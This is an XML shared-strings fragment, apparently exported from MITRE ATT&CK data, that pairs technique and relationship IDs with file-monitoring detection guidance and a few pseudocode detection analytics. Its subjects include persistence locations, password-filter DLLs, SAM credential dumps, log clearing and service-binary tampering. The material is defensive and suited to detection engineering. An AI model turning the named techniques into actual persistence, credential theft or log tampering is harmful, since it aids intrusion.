    <t>Monitor for newly constructed files that are added to absolute paths of shared libraries such as LD_PRELOAD on Linux and DYLD_INSERT_LIBRARIES on macOS.</t>
  </si>
  <si>
    <t>relationship--1c4e80fb-740d-4318-8047-0668566ce38e</t>
  </si>
  <si>
    <t>attack-pattern--0533ab23-3f7d-463f-9bd8-634d27e4dee1</t>
  </si>
  <si>
    <t>Monitor for newly constructed files containing large amounts of data. Abnormal file sizes may be an indicator of embedded content.</t>
  </si>
  <si>
    <t>relationship--ab0cb560-f859-4bfd-b237-ab7a35179054</t>
  </si>
  <si>
    <t>Monitor emond rules creation by checking for files created in &lt;code&gt;/etc/emond.d/rules/&lt;/code&gt; and &lt;code&gt;/private/var/db/emondClients&lt;/code&gt;.</t>
  </si>
  <si>
    <t>relationship--7097c09f-9d93-4107-9b24-f65481d636fa</t>
  </si>
  <si>
    <t>Monitor newly constructed files that may establish persistence and/or elevate privileges using system mechanisms that trigger execution based on specific events.</t>
  </si>
  <si>
    <t>relationship--6da713c7-4883-4450-8022-1b0907bbc54d</t>
  </si>
  <si>
    <t>attack-pattern--70d81154-b187-45f9-8ec5-295d01255979</t>
  </si>
  <si>
    <t xml:space="preserve">Monitor for newly constructed files to match an existing service executable, it could be detected and correlated with other suspicious behavior.  </t>
  </si>
  <si>
    <t>relationship--2b05b960-103a-4922-a8e3-49378bf827bf</t>
  </si>
  <si>
    <t>Monitor for newly constructed files that may deface systems external to an organization in an attempt to deliver messaging, intimidate, or otherwise mislead an organization or users.</t>
  </si>
  <si>
    <t>relationship--70749e7d-7d83-4543-8019-593de42b2a49</t>
  </si>
  <si>
    <t xml:space="preserve">Monitor for newly constructed .LNK, .SCF, or any other files on systems and within virtual environments that contain resources that point to external network resources </t>
  </si>
  <si>
    <t>relationship--78dcc48d-546c-459d-a4b2-a7a120d5afbf</t>
  </si>
  <si>
    <t>attack-pattern--d4dc46e3-5ba5-45b9-8204-010867cacfcb</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</si>
  <si>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</si>
  <si>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relationship--f6d9f305-bd14-4d86-939d-781aaf512e32</t>
  </si>
  <si>
    <t>Monitor the file system and shell commands for files being created with a leading ".”</t>
  </si>
  <si>
    <t>relationship--5dc6d333-b9e2-410e-a11a-a40fa092eb81</t>
  </si>
  <si>
    <t>Monitor for newly constructed files that may attempt to hide artifacts associated with their behaviors to evade detection.</t>
  </si>
  <si>
    <t>relationship--f5985c00-3f5c-4fcc-b29d-d395db4d02cc</t>
  </si>
  <si>
    <t>Monitor for newly constructed files that may execute their own malicious payloads by hijacking the way operating systems run programs.</t>
  </si>
  <si>
    <t>relationship--4f86632a-1bf5-4e15-a3fa-590c06642286</t>
  </si>
  <si>
    <t>Monitor for creation of files (especially DLLs on webservers) that could be abused as malicious ISAPI extensions/filters or IIS modules.</t>
  </si>
  <si>
    <t>relationship--8ee050ff-df02-42a0-b3bb-fb967565a4ec</t>
  </si>
  <si>
    <t>Monitor for file creation and files transferred into the network</t>
  </si>
  <si>
    <t>relationship--31a38a3d-0358-4e92-b2cf-0d4f74022f15</t>
  </si>
  <si>
    <t>Monitor creation of files associated with installer packages that may be abused for malicious execution.</t>
  </si>
  <si>
    <t>relationship--bd2b8201-022c-473f-88ae-94200ca6cc53</t>
  </si>
  <si>
    <t>Monitor for newly constructed files that may deface systems internal to an organization in an attempt to intimidate or mislead users.</t>
  </si>
  <si>
    <t>relationship--59957dc8-edca-43f0-ad5f-726ab4b4aa22</t>
  </si>
  <si>
    <t>Monitor for newly constructed files that may modify the kernel to automatically execute programs on system boot.</t>
  </si>
  <si>
    <t>relationship--756a8f86-de67-4cf0-b1bb-92364583a0e7</t>
  </si>
  <si>
    <t>attack-pattern--887274fc-2d63-4bdc-82f3-fae56d1d5fdc</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</si>
  <si>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</si>
  <si>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relationship--b4f84fa2-5cca-4df3-ab7c-bce3c0e3ca18</t>
  </si>
  <si>
    <t>Monitor newly constructed files that may modify or add LSASS drivers to obtain persistence on compromised systems.</t>
  </si>
  <si>
    <t>relationship--7ae9b8ce-5675-4a39-822c-b603f7ad816b</t>
  </si>
  <si>
    <t xml:space="preserve">Monitor newly constructed files to/from a lateral tool transfer </t>
  </si>
  <si>
    <t>relationship--f39246a9-9a31-4bca-b04d-48dfc77a0ef7</t>
  </si>
  <si>
    <t>Monitor for newly constructed files that may create or modify launch agents to repeatedly execute malicious payloads as part of persistence.</t>
  </si>
  <si>
    <t>relationship--403d4873-5c16-42a0-ae6c-641f2b8bf2c8</t>
  </si>
  <si>
    <t>Monitor for new files added to the &lt;code&gt;/Library/LaunchDaemons/&lt;/code&gt; folder. The System LaunchDaemons are protected by SIP.</t>
  </si>
  <si>
    <t>relationship--4d924a19-affe-4c1b-9622-ad140f334a39</t>
  </si>
  <si>
    <t>relationship--34e90f3c-05d0-4202-8650-efe971222c99</t>
  </si>
  <si>
    <t>Monitor for the creation of and/or changes to login hook files (&lt;code&gt;/Library/Preferences/com.apple.loginwindow.plist&lt;/code&gt;), especially by unusual accounts outside of normal administration duties.</t>
  </si>
  <si>
    <t>relationship--1a602d0d-d61d-461c-a79b-8fd7db102272</t>
  </si>
  <si>
    <t>attack-pattern--84601337-6a55-4ad7-9c35-79e0d1ea2ab3</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</si>
  <si>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</si>
  <si>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relationship--2f8630a6-056d-4991-a664-274b532cb5cc</t>
  </si>
  <si>
    <t>Monitor for creation and use of .msc files. MMC may legitimately be used to call Microsoft-created .msc files, such as &lt;code&gt;services.msc&lt;/code&gt; or &lt;code&gt;eventvwr.msc&lt;/code&gt;. Invoking non-Microsoft .msc files may be an indicator of malicious activity.</t>
  </si>
  <si>
    <t>relationship--c458dfb3-2f9a-4d55-9371-3ecaaf4c60f3</t>
  </si>
  <si>
    <t>attack-pattern--232b7f21-adf9-4b42-b936-b9d6f7df856e</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</si>
  <si>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&lt;h4&gt; Analytic 1 : Batch File Write to System32 &lt;/h4&gt;
&lt;code&gt; batch_files = filter files where (
  extension =".bat" AND file_path = "C:\Windows\system32*" ) &lt;/code&gt;</t>
  </si>
  <si>
    <t>relationship--a6f2748c-49ec-4027-8b29-4fee3128cc2e</t>
  </si>
  <si>
    <t>attack-pattern--ef67e13e-5598-4adc-bdb2-998225874fa9</t>
  </si>
  <si>
    <t>malicious documents and files that are downloaded from a link and executed on the user's computer</t>
  </si>
  <si>
    <t>relationship--048d55fb-9a37-41a8-9bc6-15c507bf2af2</t>
  </si>
  <si>
    <t>attack-pattern--7e7c2fba-7cca-486c-9582-4c1bb2851961</t>
  </si>
  <si>
    <t>Monitor compressed/archive and image files downloaded from the Internet as the contents may not be tagged with the MOTW. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities.</t>
  </si>
  <si>
    <t>relationship--ecb422f4-f957-4a33-aa32-b1f77bc626b6</t>
  </si>
  <si>
    <t>Monitor for suspicious additions to the `/Library/Security/SecurityAgentPlugins` directory.(Citation: Xorrior Authorization Plugins)
Monitor for newly created files that may be used to register malicious network provider dynamic link libraries (DLLs).</t>
  </si>
  <si>
    <t>relationship--674679c9-0d34-43f2-8114-7066e613c4f1</t>
  </si>
  <si>
    <t>Monitor use of HTA files. If they are not typically used within an environment then execution of them may be suspicious</t>
  </si>
  <si>
    <t>relationship--96007b55-dbe3-4127-b2ec-3bfe30a911b9</t>
  </si>
  <si>
    <t>Monitor for newly constructed files by unusual accounts outside of normal administration duties</t>
  </si>
  <si>
    <t>relationship--ec93d74e-482d-47f0-bd1d-307aa8cd6d77</t>
  </si>
  <si>
    <t>attack-pattern--90c4a591-d02d-490b-92aa-619d9701ac04</t>
  </si>
  <si>
    <t>Monitor for newly created files that may be used to register malicious network provider dynamic link libraries (DLLs).</t>
  </si>
  <si>
    <t>relationship--f8b0bc4b-4275-4684-9ced-52969cbaabe5</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</si>
  <si>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</si>
  <si>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relationship--5ba66b71-d1a1-4826-bebe-db0861583e6c</t>
  </si>
  <si>
    <t>Monitor for newly constructed files that may leverage Microsoft Office-based applications for persistence between startups.</t>
  </si>
  <si>
    <t>relationship--112cfc90-3f58-4585-a792-9ec4e5dd549f</t>
  </si>
  <si>
    <t>Monitor for newly constructed files that may abuse Microsoft Office templates to obtain persistence on a compromised system.</t>
  </si>
  <si>
    <t>relationship--0907e99a-5ea4-4180-8af4-003121dbc3ca</t>
  </si>
  <si>
    <t>Monitor for newly constructed files that may abuse the Microsoft Office "Office Test" Registry key to obtain persistence on a compromised system.</t>
  </si>
  <si>
    <t>relationship--9db9d690-2c71-4d97-ae9e-445f4bceb279</t>
  </si>
  <si>
    <t>attack-pattern--3731fbcd-0e43-47ae-ae6c-d15e510f0d42</t>
  </si>
  <si>
    <t>Monitor for newly constructed files that may register malicious password filter dynamic link libraries (DLLs) into the authentication process to acquire user credentials as they are validated.</t>
  </si>
  <si>
    <t>relationship--65a49aed-072a-489d-816d-d72dcede70d4</t>
  </si>
  <si>
    <t>attack-pattern--0c2d00da-7742-49e7-9928-4514e5075d32</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</si>
  <si>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</si>
  <si>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relationship--042438ba-9657-411d-a3b9-7f321dcd3f08</t>
  </si>
  <si>
    <t>attack-pattern--58af3705-8740-4c68-9329-ec015a7013c2</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</si>
  <si>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</si>
  <si>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relationship--d2aaef64-8ec9-41f0-b071-a3d6ca487148</t>
  </si>
  <si>
    <t>attack-pattern--bf96a5a3-3bce-43b7-8597-88545984c07b</t>
  </si>
  <si>
    <t>relationship--6881db09-7aba-4b60-8921-c9030a739cdf</t>
  </si>
  <si>
    <t>Monitor for newly constructed files from a phishing messages to gain access to victim systems.</t>
  </si>
  <si>
    <t>relationship--1d10247e-d92b-4180-be41-c81b8c8f98b3</t>
  </si>
  <si>
    <t>attack-pattern--43881e51-ac74-445b-b4c6-f9f9e9bf23fe</t>
  </si>
  <si>
    <t>Monitor newly constructed files that may use port monitors to run an attacker supplied DLL during system boot for persistence or privilege escalation.</t>
  </si>
  <si>
    <t>relationship--5359495a-f645-4315-8b74-61bfee6703f5</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</si>
  <si>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</si>
  <si>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relationship--f624a474-a667-4305-bf2a-dabecaa97580</t>
  </si>
  <si>
    <t>Monitor for newly constructed files that may abuse print processors to run malicious DLLs during system boot for persistence and/or privilege escalation.</t>
  </si>
  <si>
    <t>relationship--51d90b02-90e9-4629-b462-a0890658a845</t>
  </si>
  <si>
    <t xml:space="preserve">Monitor for newly constructed /etc/rc.local file </t>
  </si>
  <si>
    <t>relationship--1c0fcf41-bb65-41f0-bbf7-9af5212c2d68</t>
  </si>
  <si>
    <t>relationship--5c6ec6a7-6f15-4704-a16b-4bfd793a271e</t>
  </si>
  <si>
    <t>Monitor for newly constructed files on removable media</t>
  </si>
  <si>
    <t>relationship--fc610622-4ecf-4bf8-b27a-d0a11e4b9f15</t>
  </si>
  <si>
    <t>Monitor for newly constructed files that may abuse resource forks to hide malicious code or executables to evade detection and bypass security applications.</t>
  </si>
  <si>
    <t>relationship--e8f4a20b-0daf-443a-a283-1ff55649d320</t>
  </si>
  <si>
    <t>Monitor for common cryptomining or proxyware files on local systems that may indicate compromise and resource usage.</t>
  </si>
  <si>
    <t>relationship--867e25d3-bf89-4072-bd97-c6e3176ccc11</t>
  </si>
  <si>
    <t>Monitor for newly constructed files associated with running a virtual instance, such as binary files associated with common virtualization technologies (ex: VirtualBox, VMware, QEMU, Hyper-V).</t>
  </si>
  <si>
    <t>relationship--d63b16af-3fa0-4ae3-a136-49f600818a3c</t>
  </si>
  <si>
    <t>attack-pattern--32ad5c86-2bcf-47d8-8fdc-d7f3d79a7490</t>
  </si>
  <si>
    <t>relationship--d847def2-acb8-4883-8e81-2d20196ce74d</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</si>
  <si>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&lt;h4&gt;Analytic 1 - Scheduled Task - File Creation &lt;/h4&gt;
&lt;code&gt;task_files = filter files where (
  (file_path = "C:\Windows\System32\Tasks\*" or file_path = "C:\Windows\Tasks\*")  and
  image_path != "C:\WINDOWS\system32\svchost.exe")&lt;/code&gt;
</t>
  </si>
  <si>
    <t>relationship--282ef918-f550-4fb1-8ee9-949b640ef461</t>
  </si>
  <si>
    <t>Monitor newly constructed files that may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code.</t>
  </si>
  <si>
    <t>relationship--35acff32-7f4e-4937-b05f-baa27f1e745b</t>
  </si>
  <si>
    <t>Monitor newly constructed files that may establish persistence by executing malicious content triggered by user inactivity.
&lt;h4&gt; Analytic 1 - Created on disk that are being used as Screensaver files &lt;/h4&gt;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</si>
  <si>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relationship--5122573a-278d-42bc-a8c8-728b1be0a361</t>
  </si>
  <si>
    <t>Monitor newly constructed files being written with default names that have extracted credentials from the Security Account Manager.</t>
  </si>
  <si>
    <t>relationship--81284958-0a4a-45bd-9929-a5371b2d9148</t>
  </si>
  <si>
    <t>Consider monitoring file locations associated with the installation of new application software components such as paths from which applications typically load such extensible components.</t>
  </si>
  <si>
    <t>relationship--92cd9f7e-cf26-4187-ae92-9751d3d20a53</t>
  </si>
  <si>
    <t>attack-pattern--9e8b28c9-35fe-48ac-a14d-e6cc032dcbcd</t>
  </si>
  <si>
    <t>Monitor for creation of binaries and service executables that do not occur during a regular software update or an update scheduled by the organization. This behavior also considers files that are overwritten.</t>
  </si>
  <si>
    <t>relationship--52eba50c-4ebb-4e61-8065-4f6483f55321</t>
  </si>
  <si>
    <t>attack-pattern--4ab929c6-ee2d-4fb5-aab4-b14be2ed7179</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</si>
  <si>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</si>
  <si>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relationship--7161bcc6-61fd-41d6-bb3d-806bad40093d</t>
  </si>
  <si>
    <t>Monitor for newly constructed files from a spearphishing emails with a malicious attachment in an attempt to gain access to victim systems.</t>
  </si>
  <si>
    <t>relationship--9781e322-a7a6-48c3-9b3c-b30283aa3be2</t>
  </si>
  <si>
    <t>relationship--33c1dd3a-d38b-46f2-822f-33092e6b8528</t>
  </si>
  <si>
    <t>attack-pattern--1cfcb312-b8d7-47a4-b560-4b16cc677292</t>
  </si>
  <si>
    <t>relationship--b237b06d-5c53-4d9d-8279-8ad1154df2f1</t>
  </si>
  <si>
    <t>Monitor for file activity (creations, downloads, modifications, etc.), especially for file types that are not typical within an environment and may be indicative of adversary activity.</t>
  </si>
  <si>
    <t>relationship--63d46401-d4b4-4b92-81ee-41956a212523</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</si>
  <si>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</si>
  <si>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relationship--e14101d9-0b43-4416-a25b-cdb0f9f37ef9</t>
  </si>
  <si>
    <t>attack-pattern--246fd3c7-f5e3-466d-8787-4c13d9e3b61c</t>
  </si>
  <si>
    <t>Monitor for newly constructed files from files that write or overwrite many files to a network shared directory may be suspicious.</t>
  </si>
  <si>
    <t>relationship--df2f463d-f36a-467d-a403-cad99f5df2e9</t>
  </si>
  <si>
    <t>relationship--b8594cae-f7d4-4f56-b6ec-b458d9aa101a</t>
  </si>
  <si>
    <t>Monitor for newly constructed files that may establish persistence by executing malicious content triggered by an interrupt signal.</t>
  </si>
  <si>
    <t>relationship--37f81b38-7460-4750-a9f5-0df91bd20c59</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</si>
  <si>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</si>
  <si>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relationship--2105f57c-a6f5-4f9e-b040-705c58396fc2</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</si>
  <si>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</si>
  <si>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relationship--687a617d-c428-4853-b707-6f4b2f298112</t>
  </si>
  <si>
    <t>File monitoring may be used to detect changes to files in the Web directory of a Web server that do not match with updates to the Web server's content and may indicate implantation of a Web shell script.(Citation: NSA Cyber Mitigating Web Shells)</t>
  </si>
  <si>
    <t>relationship--391c4e76-2560-4a05-9024-1e16b4cdd3ae</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</si>
  <si>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</si>
  <si>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relationship--4146f8e7-c1f2-46b7-94ad-11d2fae5fa91</t>
  </si>
  <si>
    <t>x-mitre-data-component--e905dad2-00d6-477c-97e8-800427abd0e8</t>
  </si>
  <si>
    <t>Monitor for unexpected deletion of a command history file, such as ConsoleHost_history.txt, ~/.zsh_history, or ~/.bash_history.
&lt;h4&gt; Analytic 1 : Deletion of command history files&lt;/h4&gt;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t>
  </si>
  <si>
    <t>relationship--d1af80bc-f27a-46ef-9dea-4aa67a6a83f6</t>
  </si>
  <si>
    <t xml:space="preserve">Monitor for unexpected deletion of a system log file, typically stored in /var/logs or /Library/Logs. </t>
  </si>
  <si>
    <t>relationship--29908e34-dba9-41c7-bc4e-f1c2c97dab17</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</si>
  <si>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</si>
  <si>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relationship--5a4eaa40-8146-4377-84da-dd47cca37245</t>
  </si>
  <si>
    <t>Monitor for a file that may delete or alter generated artifacts associated with persistence on a host system.</t>
  </si>
  <si>
    <t>relationship--18ad6ce1-78a8-4f69-badb-2b5e2cdc8691</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</si>
  <si>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&lt;h4&gt;Analytic 1 - User Activity from Clearing Event Logs &lt;/h4&gt;
&lt;code&gt; cleared_logs = filter log_files where ((log_name = "Security") AND (event_id = "1100" OR event_id ="1102" OR event_id = "1104")) OR (log_name = "System" AND event_code = "104")&lt;/code&gt;</t>
  </si>
  <si>
    <t>relationship--70580204-2b28-4ffe-bdfc-a1db075ff0eb</t>
  </si>
  <si>
    <t>Monitor for unexpected deletion of  client software binaries to establish persistent access to systems.</t>
  </si>
  <si>
    <t>relationship--5f04c4f3-15aa-4fca-8702-c6382ce001f6</t>
  </si>
  <si>
    <t xml:space="preserve">Monitor for unexpected deletion to a file (ex: Sysmon EID 23) </t>
  </si>
  <si>
    <t>relationship--411e562d-73f7-44d4-800f-7da9746f02d6</t>
  </si>
  <si>
    <t xml:space="preserve">Monitor for unexpected deletion of a file in order to manipulate external outcomes or hide activity </t>
  </si>
  <si>
    <t>relationship--d13e15a9-b77a-4667-9fc9-f1073d68e858</t>
  </si>
  <si>
    <t>Monitor for missing log files from machines with known active periods.</t>
  </si>
  <si>
    <t>relationship--a8f2eae9-2b7a-4372-a534-52d8d281f455</t>
  </si>
  <si>
    <t>Monitor for unexpected deletion of files from the system</t>
  </si>
  <si>
    <t>relationship--f7502fdc-497f-4b1d-ad76-dcf213fd27b5</t>
  </si>
  <si>
    <t>Monitor for missing log files hosts and services with known active periods.</t>
  </si>
  <si>
    <t>relationship--d01bca45-9fa9-442a-b217-45aed5882604</t>
  </si>
  <si>
    <t>Monitor for a file that may delete or alter generated artifacts on a host system, including logs or captured files such as quarantined malware.</t>
  </si>
  <si>
    <t>relationship--6624d48a-3e16-4ab7-8d13-ff40252ebde9</t>
  </si>
  <si>
    <t>The Windows event logs, ex. Event ID 524 indicating a system catalog was deleted, may contain entries associated with suspicious activity.</t>
  </si>
  <si>
    <t>relationship--cfa27aff-a836-4a65-a427-e253587cd0ad</t>
  </si>
  <si>
    <t>relationship--771f6508-5fc0-456e-b827-05365d3b8672</t>
  </si>
  <si>
    <t>relationship--dbbf9082-6a0c-4572-a2c6-e4503a90203a</t>
  </si>
  <si>
    <t>File Metadata</t>
  </si>
  <si>
    <t>x-mitre-data-component--639e87f3-acb6-448a-9645-258f20da4bc5</t>
  </si>
  <si>
    <t>Monitor the file system for files that have the setuid or setgid bits set. On Linux, auditd can alert every time a user's actual ID and effective ID are different (this is what happens when you sudo).</t>
  </si>
  <si>
    <t>relationship--9dc99f8a-a41c-41ec-aa56-c2b6c4d37efd</t>
  </si>
  <si>
    <t>attack-pattern--5bfccc3f-2326-4112-86cc-c1ece9d8a2b5</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</si>
  <si>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</si>
  <si>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relationship--5ec0d44a-0dd0-4c28-b8b5-911d6663b09f</t>
  </si>
  <si>
    <t>attack-pattern--32901740-b42c-4fdd-bc02-345b5dc57082</t>
  </si>
  <si>
    <t>relationship--6ed9bcbc-4a4b-41ae-8064-48a5c5efb34b</t>
  </si>
  <si>
    <t>Scripts containing obfuscated content may have higher entropy of characters/strings.</t>
  </si>
  <si>
    <t>relationship--0c429ee1-c93c-4cf9-961a-60768f255f92</t>
  </si>
  <si>
    <t>Monitor for contextual data about a file, which may include information such as name, the content (ex: signature, headers, or data/media), user/owner, permissions, etc.</t>
  </si>
  <si>
    <t>relationship--d5d7b6eb-e4c3-4143-ae0d-41ebdeb2061f</t>
  </si>
  <si>
    <t>Collect and analyze signing certificate metadata and check signature validity on software that executes within the environment</t>
  </si>
  <si>
    <t>relationship--e97a70d3-07b9-4254-973f-8566874676c6</t>
  </si>
  <si>
    <t>attack-pattern--191cc6af-1bb2-4344-ab5f-28e496638720</t>
  </si>
  <si>
    <t>Use verification of distributed binaries through hash checking or other integrity checking mechanisms. Scan downloads for malicious signatures and attempt to test software and updates prior to deployment while taking note of potential suspicious activity.</t>
  </si>
  <si>
    <t>relationship--7a3df632-4f1f-44e2-b72a-b3922d9d4fe0</t>
  </si>
  <si>
    <t>attack-pattern--bd369cd9-abb8-41ce-b5bb-fff23ee86c00</t>
  </si>
  <si>
    <t>relationship--51635f44-98d9-4718-b755-cf33e4bf4df9</t>
  </si>
  <si>
    <t>Monitor for contextual data about a file, which may include information such as name, the content (ex: signature, headers, or data/media), user/owner, permissions, etc that would aid in the manipulation of data to hide activity</t>
  </si>
  <si>
    <t>relationship--f67b8650-0ebb-417f-a755-2e139796ec11</t>
  </si>
  <si>
    <t>relationship--a735d1e1-10bf-42e7-aafd-222b4d24d581</t>
  </si>
  <si>
    <t>attack-pattern--ea4c2f9c-9df1-477c-8c42-6da1118f2ac4</t>
  </si>
  <si>
    <t>Depending on the method used to obfuscate API function calls, a file-based signature may be capable of detecting dynamical resolution.(Citation: Huntress API Hash)(Citation: BlackHat API Packers)(Citation: MITRECND FindAPIHash)</t>
  </si>
  <si>
    <t>relationship--ed168bde-2ccc-4a58-a96f-6dd8e8a5776d</t>
  </si>
  <si>
    <t xml:space="preserve">Monitor contextual data about a file that may highlight embedded payloads, which may include information such as name, the content (ex: signature, headers, or data/media), file size, etc.; correlate with other suspicious behavior to reduce false positives.  </t>
  </si>
  <si>
    <t>relationship--cf52ce28-12ae-43d2-b68e-b688b9d6be47</t>
  </si>
  <si>
    <t>relationship--6b8ba493-b6f0-48d2-ba77-a23a76e555e7</t>
  </si>
  <si>
    <t>Monitor and investigate attempts to modify ACLs and file/directory ownership.</t>
  </si>
  <si>
    <t>relationship--cd0f725b-ac60-4cc2-ae01-3b4f0d53e6e9</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</si>
  <si>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</si>
  <si>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relationship--9b7fb000-e10e-4805-a828-5def5dac2b4e</t>
  </si>
  <si>
    <t>Monitor for contextual data about a file, which may include information such as name, the content (ex: signature, headers, or data/media), user/owner, permissions may set files and directories to be hidden to evade detection mechanisms.</t>
  </si>
  <si>
    <t>relationship--6c3ee326-0ce4-449d-8073-3ee0e8185821</t>
  </si>
  <si>
    <t>Monitor for contextual data about a file, which may include information such as name, the content (ex: signature, headers, or data/media), user/owner, permissions that may attempt to hide artifacts associated with their behaviors to evade detection.</t>
  </si>
  <si>
    <t>relationship--03f56095-464f-4c51-b6aa-11b1641f17cf</t>
  </si>
  <si>
    <t>Monitor for contextual file data that may show signs of deletion or alter generated artifacts on a host system, including logs or captured files such as quarantined malware.</t>
  </si>
  <si>
    <t>relationship--2f406d0e-d78c-455b-8c4b-c093fa5b5bda</t>
  </si>
  <si>
    <t>attack-pattern--b4b7458f-81f2-4d38-84be-1c5ba0167a52</t>
  </si>
  <si>
    <t>relationship--e64490db-a63d-449c-b67b-758e80d64dca</t>
  </si>
  <si>
    <t>Changes to binaries that do not line up with application updates or patches are also extremely suspicious.</t>
  </si>
  <si>
    <t>relationship--4d6675b8-b588-4164-8caa-3a4e2c023caa</t>
  </si>
  <si>
    <t>Monitor contextual data about a file that may highlight embedded malicious content, which may include information such as name, the content (ex: signature, headers, or data/media), file size, etc.; correlate with other suspicious behavior to reduce false positives.</t>
  </si>
  <si>
    <t>relationship--5d1ff7e9-1897-4722-b9d8-1455d53e39a1</t>
  </si>
  <si>
    <t>Monitor for alike file hashes or characteristics (ex: filename) that are created on multiple hosts.</t>
  </si>
  <si>
    <t>relationship--ffc74c74-bc06-4f08-96ef-5239341bc2ec</t>
  </si>
  <si>
    <t>Monitor and investigate attempts to modify ACLs and file/directory ownership. Consider enabling file/directory permission change auditing on folders containing key binary/configuration files.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</si>
  <si>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relationship--5a683179-f1fc-4113-b157-2c0a03f82083</t>
  </si>
  <si>
    <t>Monitor files (especially those downloaded from untrusted locations) for MOTW attributes. Also consider inspecting and scanning file formats commonly abused to bypass MOTW (ex: .arj, .gzip, .iso, .vhd).</t>
  </si>
  <si>
    <t>relationship--95b2f18d-b886-4364-90ef-1dbba9a2bff1</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</si>
  <si>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</si>
  <si>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relationship--abef99ab-d0a5-4c9f-9011-c79bfabccd5e</t>
  </si>
  <si>
    <t>attack-pattern--1c4e5d32-1fe9-4116-9d9d-59e3925bd6a2</t>
  </si>
  <si>
    <t>Collect file hashes; file names that do not match their expected hash are suspect. Perform file monitoring; files with known names but in unusual locations are suspect. Likewise, files that are modified outside of an update or patch are suspect.</t>
  </si>
  <si>
    <t>relationship--0ccf649d-0e00-411f-8aef-74534b3591b5</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</si>
  <si>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</si>
  <si>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relationship--c6dfa59f-88a0-4839-81ff-f4d8dd57696b</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</si>
  <si>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</si>
  <si>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relationship--bfeb4a8f-eefd-440b-9719-26a77d71afd4</t>
  </si>
  <si>
    <t>attack-pattern--7007935a-a8a7-4c0b-bd98-4e85be8ed197</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</si>
  <si>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</si>
  <si>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relationship--409de3f7-aa44-492f-9706-a6d951841079</t>
  </si>
  <si>
    <t>attack-pattern--43e7dc91-05b2-474c-b9ac-2ed4fe101f4d</t>
  </si>
  <si>
    <t>relationship--9879dc61-0fad-4e79-b225-9f529ee67d46</t>
  </si>
  <si>
    <t>Collecting and comparing disk and resource filenames for binaries by looking to see if the InternalName, OriginalFilename, and/or ProductName match what is expected could provide useful leads, but may not always be indicative of malicious activity.</t>
  </si>
  <si>
    <t>relationship--eae9381a-9045-4b71-9b80-cacea0336a1a</t>
  </si>
  <si>
    <t>Identify files with the &lt;code&gt;com.apple.ResourceFork&lt;/code&gt; extended attribute and large data amounts stored in resource forks.</t>
  </si>
  <si>
    <t>relationship--774c6d96-7fd4-44fb-97db-ddb65ce097ba</t>
  </si>
  <si>
    <t>attack-pattern--77eae145-55db-4519-8ae5-77b0c7215d69</t>
  </si>
  <si>
    <t>Monitor for common formats of RTLO characters within filenames such as \u202E, [U+202E], and %E2%80%AE. Defenders should also check their analysis tools to ensure they do not interpret the RTLO character and instead print the true name of the file containing it.</t>
  </si>
  <si>
    <t>relationship--2b57191c-74f2-4e65-9383-75d3c4c7ac4b</t>
  </si>
  <si>
    <t>Analyze contextual data about executed DLL files, which may include information such as name, the content (ex: signature, headers, or data/media), age, user/owner, permissions, etc.</t>
  </si>
  <si>
    <t>relationship--95b3ea0a-9ecf-440d-8094-7d003ed3dcf6</t>
  </si>
  <si>
    <t>relationship--845b89cf-287c-460e-a243-74229e61d856</t>
  </si>
  <si>
    <t>Monitor the file system for files that have the setuid or setgid bits set.</t>
  </si>
  <si>
    <t>relationship--d77b7f23-70ae-490d-9b7a-a166a244ee11</t>
  </si>
  <si>
    <t>attack-pattern--deb98323-e13f-4b0c-8d94-175379069062</t>
  </si>
  <si>
    <t>relationship--c82bdafd-6f44-492a-be61-00b5bac4af94</t>
  </si>
  <si>
    <t>attack-pattern--e51137a5-1cdc-499e-911a-abaedaa5ac86</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</si>
  <si>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</si>
  <si>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relationship--c210ee50-6e87-418f-a809-6b0f788dd42c</t>
  </si>
  <si>
    <t>attack-pattern--c2e147a9-d1a8-4074-811a-d8789202d916</t>
  </si>
  <si>
    <t>relationship--4d9aa029-03d5-434e-889d-79fd36b8e093</t>
  </si>
  <si>
    <t>attack-pattern--2f41939b-54c3-41d6-8f8b-35f1ec18ed97</t>
  </si>
  <si>
    <t>Detecting the presence of stripped payloads may be difficult and unwarranted in real-time, though analyzing contextual data about files (such as content and character entropy) may highlight attempts at obfuscation.</t>
  </si>
  <si>
    <t>relationship--e41950cc-dfd9-427d-accc-b7bdfacdfa8e</t>
  </si>
  <si>
    <t>relationship--3e11299d-7619-4d38-be19-bfe12058955e</t>
  </si>
  <si>
    <t>attack-pattern--3f18edba-28f4-4bb9-82c3-8aa60dcac5f7</t>
  </si>
  <si>
    <t>relationship--ecdb40b3-ef34-4d6c-9947-060077753d79</t>
  </si>
  <si>
    <t>attack-pattern--47f2d673-ca62-47e9-929b-1b0be9657611</t>
  </si>
  <si>
    <t>Monitor for file modifications that collects information on file handle opens and can compare timestamp values</t>
  </si>
  <si>
    <t>relationship--83113c78-6b4a-44ec-a327-0a929f2db652</t>
  </si>
  <si>
    <t>attack-pattern--c898c4b5-bf36-4e6e-a4ad-5b8c4c13e35b</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</si>
  <si>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</si>
  <si>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relationship--8fec240f-cafc-45f1-bf81-570653c662f8</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</si>
  <si>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</si>
  <si>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relationship--ffa83fe4-ca25-47b7-9d26-cefed3e32e7f</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</si>
  <si>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
&lt;h4&gt;Analytic 1 - Service Binary Modifications&lt;/h4&gt;
&lt;code&gt;legitimate_installers = ["C:\windows\system32\msiexec.exe", "C:\windows\syswow64\msiexec.exe", ...]
file_change = search File:Create,Modify
process = search Process:Create
service_process = filter processes where (parent_exe == "services.exe")
modified_service = join (search, filter) where (
 file_change.time &lt; service_process.time and
 file_change.file_path == service_process.image_path
)
modified_service = filter modified_service where (modified_service.file_change.image_path not in legitimate_installers)
output modified_service&lt;/code&gt;</t>
  </si>
  <si>
    <t>relationship--932745cf-b6e8-4a1d-ba44-9a22b45901e9</t>
  </si>
  <si>
    <t>File Modification</t>
  </si>
  <si>
    <t>x-mitre-data-component--84572de3-9583-4c73-aabd-06ea88123dd8</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</si>
  <si>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</si>
  <si>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relationship--6c749bf1-12d2-475c-9f14-fe0f0892286a</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</si>
  <si>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</si>
  <si>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relationship--94667a75-eaf2-4b23-868e-47ad09026b62</t>
  </si>
  <si>
    <t>Monitor for changes made to files related to account settings, such as `/etc/ssh/sshd_config` and the authorized_keys file for each user on a system.</t>
  </si>
  <si>
    <t>relationship--4b74e41a-7b30-42f9-bc7a-1accd709b215</t>
  </si>
  <si>
    <t>Monitor for changes made to files that may abuse Microsoft Office add-ins to obtain persistence on a compromised system.</t>
  </si>
  <si>
